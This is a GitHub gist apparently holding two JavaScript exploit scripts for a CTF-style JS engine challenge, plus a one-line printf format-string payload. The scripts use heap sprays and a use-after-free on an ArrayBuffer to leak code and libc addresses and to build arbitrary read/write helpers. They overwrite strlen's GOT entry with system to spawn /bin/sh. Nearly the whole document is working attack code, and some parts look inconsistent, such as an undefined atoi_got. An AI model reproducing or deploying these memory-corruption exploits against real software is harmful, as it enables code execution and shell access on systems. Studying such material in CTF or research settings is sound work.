Skip to content

Instantly share code, notes, and snippets.

@hkraw
Created June 6, 2021 04:32
Show Gist options
  • Save hkraw/b80cf80c2cc83c63d57a1fa86619b79a to your computer and use it in GitHub Desktop.
Save hkraw/b80cf80c2cc83c63d57a1fa86619b79a to your computer and use it in GitHub Desktop.
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var fclose_got = 0x45e58
var __libc_atoi = 0x18ea90
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
var heapSpray = function(size, nums) {
var s = []
for(var i = 0; i < nums; i++) {
var str = ""
for(var j = 0; j < size; j++) {
str += "A"
}
s.push(s)
}
}
Number.prototype.hex = function() {
return this.toString(16)
}
heapSpray(0x70, 0x20)
gc(); gc();
var ab = new ArrayBuffer(0x70)
var uint16_t = new Uint16Array(ab)
/* Leak Code */
var dump = {}
for(var j = 0; j < 0xffff; j++) {
var k = uint16_t.Includes(j)
if(k != undefined) {
dump[k] = j
}
}
__code_leak = parseInt("0x"+dump["62"].hex()+dump["61"].hex()+dump["60"].hex(),0)
__code_base = __code_leak - 0x460a0 /* Sentinal */
print('[*] Code @ 0x' + __code_base.hex())
var uint16_t_2 = new Uint16Array(ab)
uint16_t_2.set(72, (__code_leak&0xffff) - 0x248)
uint16_t_2.set(73, (__code_leak>>16)&0xffff)
uint16_t_2.set(74, dump["62"])
uint16_t_2.set(76,3)
var leak = {}
for(var i = 0; i < 0xffff; i++) {
var k = uint16_t.Includes(i)
if(k != undefined) {
leak[k] = i
}
}
var __libc_leak = parseInt("0x"+leak["2"].hex()+leak["1"].hex()+leak["0"].hex())
var __libc_base = __libc_leak - 0x84f50
var __strlen_libc_got = __libc_base + 0x1eb0a8
var __system = __libc_base + 0x55410
print('[*] libc @ 0x'+__libc_base.hex())
uint16_t_2.set(72, (__strlen_libc_got&0xffff))
uint16_t_2.set(73, (__strlen_libc_got>>16)&0xffff)
uint16_t_2.set(74, leak["2"])
uint16_t.set(0, __system&0xffff)
uint16_t.set(1, (__system>>16)&0xffff)
uint16_t.set(2, leak["2"])
print('/bin/sh')
for(;;){}
}
pwn()
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var __memset_got = 0x43e98
var __libc_memset = 0x18eaf0
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
var heapSpray = function(size, nums) {
var s = []
for(var i = 0; i < nums; i++) {
s[i] = new Uint32Array(size)
s[i].fill(0x41414141)
}
}
var uaf = function(ab) {
new Uint32Array(ab)
}
Number.prototype.hex = function() {
return this.toString(16)
}
/* ====================================== Exploit ===================================== */
heapSpray(k_jsObjectSize/4, 0x10)
gc()
var ab = new ArrayBuffer(k_jsObjectSize)
uaf(ab)
gc() /* ab->backingStore is a dangling pointer now */
/* Replace UAF memory */
var target_ta = []
for(var i = 0; i < 0x100; i++) {
target_ta.push(new Uint32Array(0x10))
target_ta[i].fill(0x41414141)
}
var replaced = new Uint32Array(ab)
var __codeleak_lower32 = replaced.get(2)
var __codeleak_high32 = replaced.get(3)
var __codebase = [__codeleak_high32, __codeleak_lower32 - 0x440a0] /* Sentinal addr */
print('[*] code @ 0x' + __codebase[0].hex()+__codebase[1].hex())
/* arbitrary read / write helper */
var abRead = function(where) {
replaced.set(8, where[1])
replaced.set(9, where[0])
for(var i = 0; i < 0x100; i++) {
if(target_ta[i].get(0) != 0x41414141)
return [
target_ta[i].get(0),
target_ta[i].get(1)
]
}
}
var abWrite = function(what, where) {
replaced.set(8, where[1])
replaced.set(9, where[0])
for(var i = 0; i < 0x100; i++)
if(target_ta[i].get(0) != 0x41414141) {
target_ta[i].set(0, what[0])
target_ta[i].set(1, what[1])
}
}
var atoi = abRead([__codebase[0],__codebase[1]+atoi_got])
var __libc_base = [atoi[1], atoi[0]-__libc_memset]
print('[*] atoi @ 0x' + atoi[1].hex()+atoi[0].hex())
print('[*] libc @ 0x'+__libc_base[0].hex()+__libc_base[1].hex())
var __libc_system = 0x55410
var system = [__libc_base[1]+__libc_system,__libc_base[0]]
var __strlen_libc_got = [__libc_base[0],__libc_base[1]+0x1eb0a8]
abWrite(system, __strlen_libc_got)
print('/bin/sh')
for(;;) {}
}
pwn()
printf("Just send this a few times and you will get a shell");
fmt = "%c%c%c%5c%hhn%186326c%*8$d%5$n"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment